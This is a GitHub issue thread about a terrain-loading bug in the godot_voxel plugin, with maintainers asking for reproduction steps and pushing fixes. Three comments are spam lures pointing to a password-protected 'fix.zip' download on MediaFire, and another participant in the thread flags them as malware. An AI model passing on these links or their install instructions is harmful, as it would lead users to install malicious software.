### ISSUE TITLE
Unexpected holes and triangle patches when loading the editd blocks 

### ISSUE THREAD

**Issue by lenesxy** [Zylann/godot_voxel#691] opened 2024-08-28 03:40 UTC
When applicable, please describe your setup:
- Plugin version (or where you got it):https://github.com/Zylann/godot_voxel/archive/refs/tags/v1.3.0.zip
- Godot version:https://github.com/godotengine/godot/archive/refs/tags/4.3-stable.zip
- OS:Windows10
- Project:https://github.com/Zylann/solar_system_demo.git
- ...

I used the left mouse button to edit the Earth while flying the ship. When exiting the editor and re-flying near the edited area, the problem documented in the video was discovered.

**Edited Earth**
solar_system_demo-master/debug_data/Earth.sqlite
[Earth.zip](https://github.com/user-attachments/files/16775760/Earth.zip)

**Video Link**
https://youtu.be/AUoK_OG9IVQ

**Comment by bkballoon** [comment] 2024-08-28 07:25
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Zireael07** [comment] 2024-08-28 07:26
Comment above is a spam, links have been determined to be malware

**Comment by qiliq** [comment] 2024-08-28 07:42
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Zireael07** [comment] 2024-08-28 07:50
... another one shows up

**Comment by MGilleronFJ** [comment] 2024-08-28 09:25
Any errors in the console? (not just when reopening, but when playing the first session as well)

Also, how did you quit the game? Keep in mind if you use Godot's Stop button, [saving can break](https://voxel-tools.readthedocs.io/en/latest/streams/#closing-the-game).

**Comment by chenkeyu123** [comment] 2024-08-28 10:37
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MGilleronFJ** [comment] 2024-08-29 09:24
> These are the errors reported by the Godot editor when opening the project:

These errors can be ignored, the mannequin addon is not used currently.

> Btw I disable the volume.full_load_mode_enabled

While this is not supposed to cause issues, it is not something the demo was tuned with. Turning this off pretty much enables data streaming, which will impair some features of the demo such as detail rendering and loading speed.

Before using this demo, have you tried using VoxelLodTerrain with a generator and VoxelStreamSQLite in a basic project, to see if it also happens there?

**Comment by MGilleronFJ** [comment] 2024-08-29 13:20
I tried making a test project where I dig a hole, then move away then come back closer, but I could not reproduce the issue...
If you manage to reproduce this in a minimal test project, it would help a lot.

**Comment by MGilleronFJ** [comment] 2024-08-30 09:17
> Btw I disable the volume.full_load_mode_enabled in _setup_rocky_planet() of res://solar_system/solar_system_setup.gd

Have you done any other changes?
I was able to reproduce the issue in my local version, however it is specifically because I had the streaming sytem set to Clipbox. Octree would not be affected by it.

**Comment by MGilleronFJ** [comment] 2024-08-30 10:20
There is another issue that would affect both systems, which would also print this warning:
https://github.com/Zylann/godot_voxel/blob/3a9775f6fc45f2475c8a9e487885859bc9abed99/storage/voxel_buffer.cpp#L200
However you said you had no errors, you might check warnings too

**Comment by Zylann** [comment] 2024-08-30 18:32
Pushed some fixes that may (or may not) affect your reproduction attempts:

- 8ca295dea53766eb42dd9f5c42806de5de1b6308
- 9dcaa1519a8be3a927358144307fe02c563e61a5

**Closed** 2024-09-14 15:59 UTC
Labels: bug, Reproduction needed
